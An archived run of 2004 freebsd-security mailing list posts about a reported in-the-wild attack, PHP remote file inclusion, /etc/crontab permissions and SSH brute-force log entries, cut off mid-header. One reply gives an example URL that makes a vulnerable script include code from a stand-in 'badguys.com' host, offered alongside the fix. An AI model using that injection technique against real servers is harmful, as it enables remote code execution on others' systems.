; Wed, 11 Aug 2004 21:07:15 +0000 (GMT) Received: from drizzle.sasknow.net (drizzle.sasknow.net [204.83.220.141]) by mx1.FreeBSD.org (Postfix) with ESMTP id C164A43D46 for ; Wed, 11 Aug 2004 21:07:14 +0000 (GMT) (envelope-from ryan@sasknow.com) Received: from mail.sasknow.com (mail.sasknow.com [207.195.92.135]) by drizzle.sasknow.net (8.12.9p2/8.12.9) with ESMTP id i7BL7B2v018509 for ; Wed, 11 Aug 2004 15:07:11 -0600 (CST) (envelope-from ryan@sasknow.com) Date: Wed, 11 Aug 2004 15:07:11 -0600 (CST) From: Ryan Thompson To: freebsd-security@freebsd.org Message-ID: <20040811145637.R41454@drizzle.sasknow.net> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed X-Spam-Virus-Status: Clean, ClamAV version devel-20040729, clamav-milter version 0.75b on drizzle.sasknow.net X-Spam-Status: No, hits=-19.409 required=7 tests=MSGID_PINE=-2.1,ALL_TRUSTED=-0.8,BAYES_00=-4.9,BAYES_LOW_AND_TZ_NEAR=-7.0,TIME_13_17_BAYES_LOW=-7.0,AWL=2.4 autolearn=no version=3.000000-pre3 Subject: FreeBSD-SA-04:13.linux in the wild X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 11 Aug 2004 21:07:15 -0000 Has anyone else seen this in the wild? We just had an attempted attack yesterday from a live attacker on one of our machines using this vulnerability. It wasn't all that clever, and they're long gone, but I *did* manage to catch them in the act and grab a copy of the binary they tried to run from /tmp/, as well as the PHP injection code they used to subvert a virtual web site's poorly-written index.php script to execute commands as a local user. Their first order of business was uname -a, and the timing of the requests appeared to be random and experimental ("cd /tmp; ls -la", a few times). If any @FreeBSD.org developers would like more information, I'd be happy to share my findings and log output off-list. - Ryan -- Ryan Thompson SaskNow Technologies - http://www.sasknow.com 901-1st Avenue North - Saskatoon, SK - S7K 1Y4 Tel: 306-664-3600 Fax: 306-244-7037 Saskatoon Toll-Free: 877-727-5669 (877-SASKNOW) North America From owner-freebsd-security@FreeBSD.ORG Wed Aug 11 21:24:10 2004 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7899916A4DE for ; Wed, 11 Aug 2004 21:24:10 +0000 (GMT) Received: from master4.yvr1.superb.net (master4.yvr1.superb.net [209.90.166.20]) by mx1.FreeBSD.org (Postfix) with ESMTP id C580243D48 for ; Wed, 11 Aug 2004 21:24:09 +0000 (GMT) (envelope-from gbaratto@superb.net) Received: from chivas (fw.yvr1.superb.net [209.90.166.2]) i7BLO6ne020501; Wed, 11 Aug 2004 14:24:06 -0700 (PDT) Message-ID: <015701c47fe9$83dc7ff0$9c01a8c0@chivas> From: "Gustavo A. Baratto" To: "Ryan Thompson" , References: <20040811145637.R41454@drizzle.sasknow.net> Date: Wed, 11 Aug 2004 14:23:58 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2800.1437 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1441 Subject: Re: FreeBSD-SA-04:13.linux in the wild X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 11 Aug 2004 21:24:10 -0000 I think I may have seen such thing before as well... not a freebsd problem though... It's php's own fault. php comes with url_fopen enabled by default, so if someone write a script.php with something like: include ("$var"); One could call the http://goodguys.com/script.php?var=http://badguys.com/malicious_script.txt the text of malicious_script.php hosted remotely would be included in scrip.php, and any arbitrary code would be executed with www privileges. just disabling url_fopen in php.ini would prevent that. If this is not what you have seen, please, I'd like to know more about it. Thank you ;) ----- Original Message ----- From: "Ryan Thompson" To: Sent: Wednesday, August 11, 2004 2:07 PM Subject: FreeBSD-SA-04:13.linux in the wild > > Has anyone else seen this in the wild? > > We just had an attempted attack yesterday from a live attacker on one of > our machines using this vulnerability. It wasn't all that clever, and > they're long gone, but I *did* manage to catch them in the act and grab > a copy of the binary they tried to run from /tmp/, as well as the PHP > injection code they used to subvert a virtual web site's poorly-written > index.php script to execute commands as a local user. > > Their first order of business was uname -a, and the timing of the > requests appeared to be random and experimental ("cd /tmp; ls -la", a > few times). If any @FreeBSD.org developers would like more information, > I'd be happy to share my findings and log output off-list. > > - Ryan > > -- > Ryan Thompson > > SaskNow Technologies - http://www.sasknow.com > 901-1st Avenue North - Saskatoon, SK - S7K 1Y4 > > Tel: 306-664-3600 Fax: 306-244-7037 Saskatoon > Toll-Free: 877-727-5669 (877-SASKNOW) North America > _______________________________________________ > freebsd-security@freebsd.org mailing list > http://lists.freebsd.org/mailman/listinfo/freebsd-security > To unsubscribe, send any mail to "freebsd-security-unsubscribe@freebsd.org" > From owner-freebsd-security@FreeBSD.ORG Wed Aug 11 21:32:13 2004 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C68D916A4CE for ; Wed, 11 Aug 2004 21:32:13 +0000 (GMT) Received: from drizzle.sasknow.net (drizzle.sasknow.net [204.83.220.141]) by mx1.FreeBSD.org (Postfix) with ESMTP id 83D9843D1F for ; Wed, 11 Aug 2004 21:32:13 +0000 (GMT) (envelope-from ryan@sasknow.com) Received: from mail.sasknow.com (mail.sasknow.com [207.195.92.135]) by drizzle.sasknow.net (8.12.9p2/8.12.9) with ESMTP id i7BLWC2v020129; Wed, 11 Aug 2004 15:32:12 -0600 (CST) (envelope-from ryan@sasknow.com) Date: Wed, 11 Aug 2004 15:32:12 -0600 (CST) From: Ryan Thompson To: "Gustavo A. Baratto" In-Reply-To: <015701c47fe9$83dc7ff0$9c01a8c0@chivas> Message-ID: <20040811152741.R41454@drizzle.sasknow.net> References: <20040811145637.R41454@drizzle.sasknow.net> <015701c47fe9$83dc7ff0$9c01a8c0@chivas> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed X-Spam-Virus-Status: Clean, ClamAV version devel-20040729, clamav-milter version 0.75b on drizzle.sasknow.net X-Spam-Status: No, hits=-19.582 required=7 tests=MSGID_PINE=-2.1,RT_SUBJ_RE7=-0.3,ALL_TRUSTED=-0.8,BAYES_00=-4.9,BAYES_LOW_AND_TZ_NEAR=-7.0,TIME_13_17_BAYES_LOW=-7.0,AWL=2.5 autolearn=no version=3.000000-pre3 cc: freebsd-security@freebsd.org Subject: Re: FreeBSD-SA-04:13.linux in the wild X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 11 Aug 2004 21:32:13 -0000 Gustavo A. Baratto wrote to Ryan Thompson and freebsd-security@freebsd.org: > I think I may have seen such thing before as well... not a freebsd problem > though... It's php's own fault. > php comes with url_fopen enabled by default, so if someone write a > script.php with something like: > include ("$var"); > > [...] > > just disabling url_fopen in php.ini would prevent that. > > If this is not what you have seen, please, I'd like to know more about it. Yep, that's almost exactly what happened. The PHP injection by itself is fairly pedestrian, and happens on a fairly regular basis (so we have audits for a whole host of things like this). I just mentioned it to give a bit of background to the attack. The linux exploit, though, I hadn't spotted in the wild yet, thus my post, here. - Ryan -- Ryan Thompson SaskNow Technologies - http://www.sasknow.com 901-1st Avenue North - Saskatoon, SK - S7K 1Y4 Tel: 306-664-3600 Fax: 306-244-7037 Saskatoon Toll-Free: 877-727-5669 (877-SASKNOW) North America From owner-freebsd-security@FreeBSD.ORG Thu Aug 12 04:06:06 2004 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E2B0216A4CE for ; Thu, 12 Aug 2004 04:06:05 +0000 (GMT) Received: from mail.freebsd.org.cn (dns3.freebsd.org.cn [61.129.66.75]) by mx1.FreeBSD.org (Postfix) with SMTP id 1D6CB43D41 for ; Thu, 12 Aug 2004 04:06:05 +0000 (GMT) (envelope-from delphij@frontfree.net) Received: (qmail 971 invoked by uid 0); 12 Aug 2004 04:03:29 -0000 Received: from unknown (HELO beastie.frontfree.net) (219.239.98.7) by mail.freebsd.org.cn with SMTP; 12 Aug 2004 04:03:29 -0000 Received: from localhost (localhost.frontfree.net [127.0.0.1]) by beastie.frontfree.net (Postfix) with ESMTP id C97AF11F64; Thu, 12 Aug 2004 12:06:02 +0800 (CST) Received: from beastie.frontfree.net ([127.0.0.1]) by localhost (beastie.frontfree.net [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id 00631-10; Thu, 12 Aug 2004 12:05:57 +0800 (CST) Received: by beastie.frontfree.net (Postfix, from userid 1001) id D4B7F11F5E; Thu, 12 Aug 2004 12:05:56 +0800 (CST) Date: Thu, 12 Aug 2004 12:05:56 +0800 From: Xin LI To: Thomas Quinot Message-ID: <20040812040556.GC305@frontfree.net> References: <20040810161305.GA161@frontfree.net> <20040810095953.H1984@qbhto.arg> <20040811132930.GA3936@melusine.cuivre.fr.eu.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="hYooF8G/hrfVAmum" Content-Disposition: inline In-Reply-To: <20040811132930.GA3936@melusine.cuivre.fr.eu.org> User-Agent: Mutt/1.4.2.1i X-GPG-key-ID/Fingerprint: 0xCAEEB8C0 / 43B8 B703 B8DD 0231 B333 DC28 39FB 93A0 CAEE B8C0 X-GPG-Public-Key: http://www.delphij.net/delphij.asc X-Operating-System: FreeBSD beastie.frontfree.net 5.2-delphij FreeBSD 5.2-delphij #3: Fri Jul 30 20:01:43 CST 2004 delphij@beastie.frontfree.net:/usr/obj/usr/src/sys/BEASTIE i386 X-URL: http://www.delphij.net X-By: delphij@beastie.frontfree.net X-Location: Beijing, China X-Virus-Scanned: by amavisd-new at frontfree.net cc: "freebsd-security@FreeBSD.org" cc: Doug Barton Subject: Re: [PATCH] Tighten /etc/crontab permissions X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 12 Aug 2004 04:06:06 -0000 --hYooF8G/hrfVAmum Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed, Aug 11, 2004 at 03:29:30PM +0200, Thomas Quinot wrote: > * Doug Barton, 2004-08-10 : >=20 > > Do you have a reason for wanting to do this other than, "OpenBSD does i= t=20 > > this way?" I personally see no problems, and some benefit for users=20 > > being able to see the system crontab. If the superuser needs to run=20 > > "secret" cron jobs, then there is root's crontab that can be used for= =20 > > this purpose. >=20 > Seconded. I would find it a nuisance to have to chmod a+r /etc/crontab > on all systems I set up. People who need tightened security against > hostile local users can use tools such as security/lockdown that will, > among many other things, remove world-read permissions from a bunch of > systemwide configuration files, including /etc/crontab. I think I would want to compromise at this point ;) In addition of this, personally I suggest the following changes to be made: - Provide an option in sysinstall so users will be instructed to choose whether to ``lockdown'' their systems as soon as the configuration is completed. Also, include this utility in the installation disc. - Add a new security audit script which will tell admins that the permission of "watched" configurations was altered. This might be turned off by default, or even a depency port of lockdown, to provide a mechanism to detect potential break-ins earlier, and to notice users when something like mergemaster or manual etc/ upgrades has reverted the permissions. What do you think about this? Actually the FreeBSD Simplified Chinese project is recently coordinating an effort of making an Internationalized FreeBSD Installer, I think we will try to implement these things if they looks better. Cheers, --=20 Xin LI http://www.delphij.net/ See complete headers for GPG key and other information. --hYooF8G/hrfVAmum Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.5 (FreeBSD) iD8DBQFBGuykOfuToMruuMARAm5tAJ437PcJgS+ducDSxcUY3KyARjIZlQCfXe3f i9Xw2EJxrbJ2jJec37c6Mwc= =NNky -----END PGP SIGNATURE----- --hYooF8G/hrfVAmum-- From owner-freebsd-security@FreeBSD.ORG Thu Aug 12 04:57:03 2004 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3928216A4CE; Thu, 12 Aug 2004 04:57:03 +0000 (GMT) Received: from rwcrmhc12.comcast.net (rwcrmhc12.comcast.net [216.148.227.85]) by mx1.FreeBSD.org (Postfix) with ESMTP id 239B043D55; Thu, 12 Aug 2004 04:57:03 +0000 (GMT) (envelope-from DougB@freebsd.org) Received: from lap (c-24-130-110-32.we.client2.attbi.com[24.130.110.32]) by comcast.net (rwcrmhc12) with SMTP id <2004081204570201400qvt9pe>; Thu, 12 Aug 2004 04:57:02 +0000 Date: Wed, 11 Aug 2004 21:57:01 -0700 (PDT) From: Doug Barton To: Xin LI In-Reply-To: <20040812040556.GC305@frontfree.net> Message-ID: <20040811215606.H817@ync.qbhto.arg> References: <20040810161305.GA161@frontfree.net> <20040810095953.H1984@qbhto.arg><20040812040556.GC305@frontfree.net> Organization: http://www.FreeBSD.org/ X-message-flag: Outlook -- Not just for spreading viruses anymore! MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed cc: "freebsd-security@FreeBSD.org" cc: Thomas Quinot Subject: Re: [PATCH] Tighten /etc/crontab permissions X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 12 Aug 2004 04:57:03 -0000 On Thu, 12 Aug 2004, Xin LI wrote: > I think I would want to compromise at this point ;) In addition of this, > personally I suggest the following changes to be made: > > - Provide an option in sysinstall so users will be instructed > to choose whether to ``lockdown'' their systems as soon as > the configuration is completed. Also, include this utility > in the installation disc. > - Add a new security audit script which will tell admins that > the permission of "watched" configurations was altered. > This might be turned off by default, or even a depency port > of lockdown, to provide a mechanism to detect potential > break-ins earlier, and to notice users when something like > mergemaster or manual etc/ upgrades has reverted the > permissions. > > What do you think about this? Actually the FreeBSD Simplified Chinese > project is recently coordinating an effort of making an Internationalized > FreeBSD Installer, I think we will try to implement these > things if they looks better. Those sound like good goals, I wish you great luck with them. :) Doug -- This .signature sanitized for your protection From owner-freebsd-security@FreeBSD.ORG Fri Aug 13 14:05:43 2004 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4C30C16A4CE for ; Fri, 13 Aug 2004 14:05:43 +0000 (GMT) Received: from www.beco.hu (mail.beco.hu [212.108.197.18]) by mx1.FreeBSD.org (Postfix) with ESMTP id D75A843D45 for ; Fri, 13 Aug 2004 14:05:41 +0000 (GMT) (envelope-from berta@beco.hu) Received: from [127.0.0.1] (apache.beco.hu [82.131.147.112]) by www.beco.hu (8.12.11/8.12.11) with ESMTP id i7DDx79U027285 for ; Fri, 13 Aug 2004 15:59:10 +0200 (CEST) (envelope-from berta@beco.hu) Message-ID: <411CCAAE.7020505@beco.hu> Date: Fri, 13 Aug 2004 16:05:34 +0200 From: Sandor Berta User-Agent: Mozilla Thunderbird 0.7.1 (Windows/20040626) X-Accept-Language: hu-hu, hu MIME-Version: 1.0 To: freebsd-security@freebsd.org Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Subject: sequences in the auth.log X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 13 Aug 2004 14:05:43 -0000 Hi all, I found similar sequences in the /var/auth.log files of freebsd boxes, I supervise.: Aug 13 13:56:08 www sshd[26091]: Illegal user test from 165.21.103.20 Aug 13 13:56:11 www sshd[26093]: Illegal user guest from 165.21.103.20 Aug 13 13:56:15 www sshd[26096]: Illegal user admin from 165.21.103.20 Aug 13 13:56:18 www sshd[26103]: Illegal user admin from 165.21.103.20 Aug 13 13:56:21 www sshd[26105]: Illegal user user from 165.21.103.20 Aug 13 13:56:25 www sshd[26107]: Failed password for root from 165.21.103.20 port 39678 ssh2 Aug 13 13:56:28 www sshd[26109]: Failed password for root from 165.21.103.20 port 39760 ssh2 Aug 13 13:56:32 www sshd[26111]: Failed password for root from 165.21.103.20 port 39836 ssh2 Aug 13 13:56:35 www sshd[26113]: Illegal user test from 165.21.103.20 Aug 13 14:25:36 www sshd[26485]: Illegal user test from 202.28.120.57 Aug 13 14:25:41 www sshd[26487]: Illegal user guest from 202.28.120.57 What are these? bye Sandor Berta From owner-freebsd-security@FreeBSD.ORG Fri Aug 13 14:11:19 2004 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C497016A4CE for ; Fri, 13 Aug 2004 14:11:19 +0000 (GMT) Received: from bast.unixathome.org (bast.unixathome.org [66.11.174.150]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7316543D3F for ; Fri, 13 Aug 2004 14:11:19 +0000 (GMT) (envelope-from dan@langille.org) Received: from xeon (xeon.unixathome.org [192.168.0.18]) by bast.unixathome.org (Postfix) with ESMTP id 5C9B03D3D; Fri, 13 Aug 2004 10:11:18 -0400 (EDT) Date: Fri, 13 Aug 2004 10:11:18 -0400 (EDT) From: Dan Langille X-X-Sender: dan@xeon.unixathome.org To: Sandor Berta In-Reply-To: <411CCAAE.7020505@beco.hu> Message-ID: <20040813101046.J48580@xeon.unixathome.org> References: <411CCAAE.7020505@beco.hu> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII cc: freebsd-security@freebsd.org Subject: Re: sequences in the auth.log X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 13 Aug 2004 14:11:19 -0000 On Fri, 13 Aug 2004, Sandor Berta wrote: > Hi all, > I found similar sequences in the > /var/auth.log files of freebsd boxes, I supervise.: > Aug 13 13:56:08 www sshd[26091]: Illegal user test from 165.21.103.20 > Aug 13 13:56:11 www sshd[26093]: Illegal user guest from 165.21.103.20 > Aug 13 13:56:15 www sshd[26096]: Illegal user admin from 165.21.103.20 > Aug 13 13:56:18 www sshd[26103]: Illegal user admin from 165.21.103.20 > Aug 13 13:56:21 www sshd[26105]: Illegal user user from 165.21.103.20 > Aug 13 13:56:25 www sshd[26107]: Failed password for root from > 165.21.103.20 port 39678 ssh2 > Aug 13 13:56:28 www sshd[26109]: Failed password for root from > 165.21.103.20 port 39760 ssh2 > Aug 13 13:56:32 www sshd[26111]: Failed password for root from > 165.21.103.20 port 39836 ssh2 > Aug 13 13:56:35 www sshd[26113]: Illegal user test from 165.21.103.20 > Aug 13 14:25:36 www sshd[26485]: Illegal user test from 202.28.120.57 > Aug 13 14:25:41 www sshd[26487]: Illegal user guest from 202.28.120.57 There are failed attempts to login via ssh. -- Dan Langille - http://www.langille.org/ From owner-freebsd-security@FreeBSD.ORG Fri Aug 13 14:12:13 2004 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B800216A4CE for ; Fri, 13 Aug 2004 14:12:13 +0000 (GMT) Received: from imap.drweb.ru (blg.drweb.ru [81.211.95.163]) by mx1.FreeBSD.org (Postfix) with ESMTP id 1780243D31 for ; Fri, 13 Aug 2004 14:12:13 +0000 (GMT) (envelope-from nikolaj@drweb.ru) Received: by imap.drweb.ru (postfix, from userid 1007) id 6A6EC550F; Fri, 13 Aug 2004 18:12:11 +0400 (MSD) Received: from [192.168.100.12] (nip [192.168.100.12]) by imap.drweb.ru (postfix) with ESMTP id 01D0C5505 for ; Fri, 13 Aug 2004 18:12:11 +0400 (MSD) Date: Fri, 13 Aug 2004 18:12:11 +0400 From: "Nikolaj I. Potanin" To: freebsd-security@freebsd.org In-Reply-To: <411CCAAE.7020505@beco.hu> References: <411CCAAE.7020505@beco.hu> Message-Id: <20040813181022.F864.NIKOLAJ@drweb.ru> MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Mailer: Becky! ver. 2.11.02 [en] X-Spam-Level: X-Spam-Checker-Version: SpamAssassin 2.63 (2004-01-11) on imap.drweb.ru X-Spam-Report: * -4.9 BAYES_00 BODY: Bayesian spam probability is 0 to 1% * [score: 0.0000] * 0.3 AWL AWL: Auto-whitelist adjustment X-Spam-Status: No, hits=-4.6 required=6.0 tests=AWL,BAYES_00 autolearn=ham version=2.63 Subject: Re: sequences in the auth.log X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 13 Aug 2004 14:12:13 -0000 Hello, Someone is trying to pick-up a password for these accounts. Restrict your ssh service to your trusted networks only. > Hi all, > I found similar sequences in the > /var/auth.log files of freebsd boxes, I supervise.: > Aug 13 13:56:08 www sshd[26091]: Illegal user test from 165.21.103.20 > Aug 13 13:56:11 www sshd[26093]: Illegal user guest from 165.21.103.20 > Aug 13 13:56:15 www sshd[26096]: Illegal user admin from 165.21.103.20 > Aug 13 13:56:18 www sshd[26103]: Illegal user admin from 165.21.103.20 > Aug 13 13:56:21 www sshd[26105]: Illegal user user from 165.21.103.20 > Aug 13 13:56:25 www sshd[26107]: Failed password for root from > 165.21.103.20 port 39678 ssh2 > Aug 13 13:56:28 www sshd[26109]: Failed password for root from > 165.21.103.20 port 39760 ssh2 > Aug 13 13:56:32 www sshd[26111]: Failed password for root from > 165.21.103.20 port 39836 ssh2 > Aug 13 13:56:35 www sshd[26113]: Illegal user test from 165.21.103.20 > Aug 13 14:25:36 www sshd[26485]: Illegal user test from 202.28.120.57 > Aug 13 14:25:41 www sshd[26487]: Illegal user guest from 202.28.120.57 > > What are these? -- Nikolaj I. Potanin, SA http://www.drweb.ru ID Anti-Virus Lab (SalD Ltd) nikolaj@drweb.ru St. Petersburg, Russia ph.: +7-812-3888624 From owner-freebsd-security@FreeBSD.ORG Fri Aug 13 14:14:39 2004 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4F5AA16A4CE for ; Fri, 13 Aug 2004 14:14:39 +0000 (GMT) Received: from mail.ki.iif.hu (mignon.ki.iif.hu [193.6.222.240]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2269A43D5D for ; Fri, 13 Aug 2004 14:14:38 +0000 (GMT) (envelope-from mohacsi@niif.hu) Received: from localhost (localhost [127.0.0.1]) by mail.ki.iif.hu (Postfix) with ESMTP id 34EF154FB; Fri, 13 Aug 2004 16:14:36 +0200 (CEST) Received: from mail.ki.iif.hu ([127.0.0.1]) by localhost (mignon.ki.iif.hu [127.0.0.1]) (amavisd-new, port 10024) with LMTP id 98757-01-25; Fri, 13 Aug 2004 16:14:29 +0200 (CEST) Received: by mail.ki.iif.hu (Postfix, from userid 1003) id C99FA54E9; Fri, 13 Aug 2004 16:14:29 +0200 (CEST) Received: from localhost (localhost [127.0.0.1]) by mail.ki.iif.hu (Postfix) with ESMTP id C7A5954C6; Fri, 13 Aug 2004 16:14:29 +0200 (CEST) Date: Fri, 13 Aug 2004 16:14:29 +0200 (CEST) From: Mohacsi Janos X-X-Sender: mohacsi@mignon.ki.iif.hu To: Sandor Berta In-Reply-To: <411CCAAE.7020505@beco.hu> Message-ID: <20040813160928.M82373@mignon.ki.iif.hu> References: <411CCAAE.7020505@beco.hu> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed X-Virus-Scanned: by amavisd-new at mail.ki.iif.hu cc: freebsd-security@freebsd.org Subject: Re: sequences in the auth.log X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 13 Aug 2004 14:14:39 -0000 Hi Sandor, You don't have to worry, unless you have user 'test', 'guest', 'admin', 'root' with poor password: typically same or very similar to your accountname. There seems to be a script around the hackers to scan SSH and gain access to poorly configured servers.... Unfortunately they are plenty of badly configured servers. May be you should disable root access via SSH password (only via keys). Regards, Janos Mohacsi Network Engineer, Research Associate NIIF/HUNGARNET, HUNGARY Key 00F9AF98: 8645 1312 D249 471B DBAE 21A2 9F52 0D1F 00F9 AF98 On Fri, 13 Aug 2004, Sandor Berta wrote: > Hi all, > I found similar sequences in the > /var/auth.log files of freebsd boxes, I supervise.: > Aug 13 13:56:08 www sshd[26091]: Illegal user test from 165.21.103.20 > Aug 13 13:56:11 www sshd[26093]: Illegal user guest from 165.21.103.20 > Aug 13 13:56:15 www sshd[26096]: Illegal user admin from 165.21.103.20 > Aug 13 13:56:18 www sshd[26103]: Illegal user admin from 165.21.103.20 > Aug 13 13:56:21 www sshd[26105]: Illegal user user from 165.21.103.20 > Aug 13 13:56:25 www sshd[26107]: Failed password for root from 165.21.103.20 > port 39678 ssh2 > Aug 13 13:56:28 www sshd[26109]: Failed password for root from 165.21.103.20 > port 39760 ssh2 > Aug 13 13:56:32 www sshd[26111]: Failed password for root from 165.21.103.20 > port 39836 ssh2 > Aug 13 13:56:35 www sshd[26113]: Illegal user test from 165.21.103.20 > Aug 13 14:25:36 www sshd[26485]: Illegal user test from 202.28.120.57 > Aug 13 14:25:41 www sshd[26487]: Illegal user guest from 202.28.120.57 > > What are these? > > bye > Sandor Berta > > _______________________________________________ > freebsd-security@freebsd.org mailing list > http://lists.freebsd.org/mailman/listinfo/freebsd-security > To unsubscribe, send any mail to "freebsd-security-unsubscribe@freebsd.org" > From owner-freebsd-security@FreeBSD.ORG Fri Aug 13 14:55:56 2004 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id DA2D516A4CE for ; Fri, 13 Aug 2004 14:55:56 +0000 (GMT) Received: from moutng.kundenserver.de (moutng.kundenserver.de [212.227.126.177]) by mx1.FreeBSD.org (Postfix) with ESMTP id 81EDE43D49 for ; Fri, 13 Aug 2004 14:55:56 +0000 (GMT) (envelope-from jan.muenther@nruns.com) Received: from [212.227.126.162] (helo=mrelayng.kundenserver.de) by moutng.kundenserver.de with esmtp (Exim 3.35 #1) id 1BvdTH-00088P-00; Fri, 13 Aug 2004 16:55:55 +0200 Received: from [212.202.43.252] (helo=localghost.muenther.de) by mrelayng.kundenserver.de with asmtp (Exim 3.35 #1) id 1BvdTH-0002z5-00; Fri, 13 Aug 2004 16:55:55 +0200 Received: by localghost.muenther.de (Postfix, from userid 1001) id AF43C21E87B; Fri, 13 Aug 2004 16:57:07 +0200 (CEST) Date: Fri, 13 Aug 2004 16:57:07 +0200 From: Jan Muenther To: Sandor Berta Message-ID: <20040813145707.GB2097@localghost.muenther.de> References: <411CCAAE.7020505@beco.hu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <411CCAAE.7020505@beco.hu> User-Agent: Mutt/1.4.2.1i X-Provags-ID: kundenserver.de abuse@kundenserver.de auth:9a8a46f2b40f7808f7699def63624ac2 cc: freebsd-security@freebsd.org Subject: Re: sequences in the auth.log X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 13 Aug 2004 14:55:57 -0000 Heya, this is probably the same piece of malware that has been discussed on f-d recently. The username/password combination guest and test are hardcoded into a little statically linked binary which is commonly used together with a SYN scanner. Chances are good these attempts are coming from a compromised box - you may want to look into that if it is in your realms. If you need more info, I disassembled them both and made a quick analysis, check the f-d archives. Cheers, J. From owner-freebsd-security@FreeBSD.ORG Fri Aug 13 15:55:39 2004 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 60EEE16A4CF for ; Fri, 13 Aug 2004 15:55:39 +0000 (GMT) Received: from mail.borderware.com (mail.borderware.com [207.236.65.231]) by mx1.FreeBSD.org (Postfix) with ESMTP id E33F843D2F for ; Fri, 13 Aug 2004 15:55:38 +0000 (GMT) (envelope-from steve@borderware.com) Message-ID: <411CE478.3050607@borderware.com> Date: Fri, 13 Aug 2004 11:55:36 -0400 From: Steve Zweep User-Agent: Mozilla Thunderbird 0.7.1 (X11/20040626) X-Accept-Language: en-us, en MIME-Version: 1.0 To: freebsd-security@freebsd.org Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Subject: ICMP attacks against TCP X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , 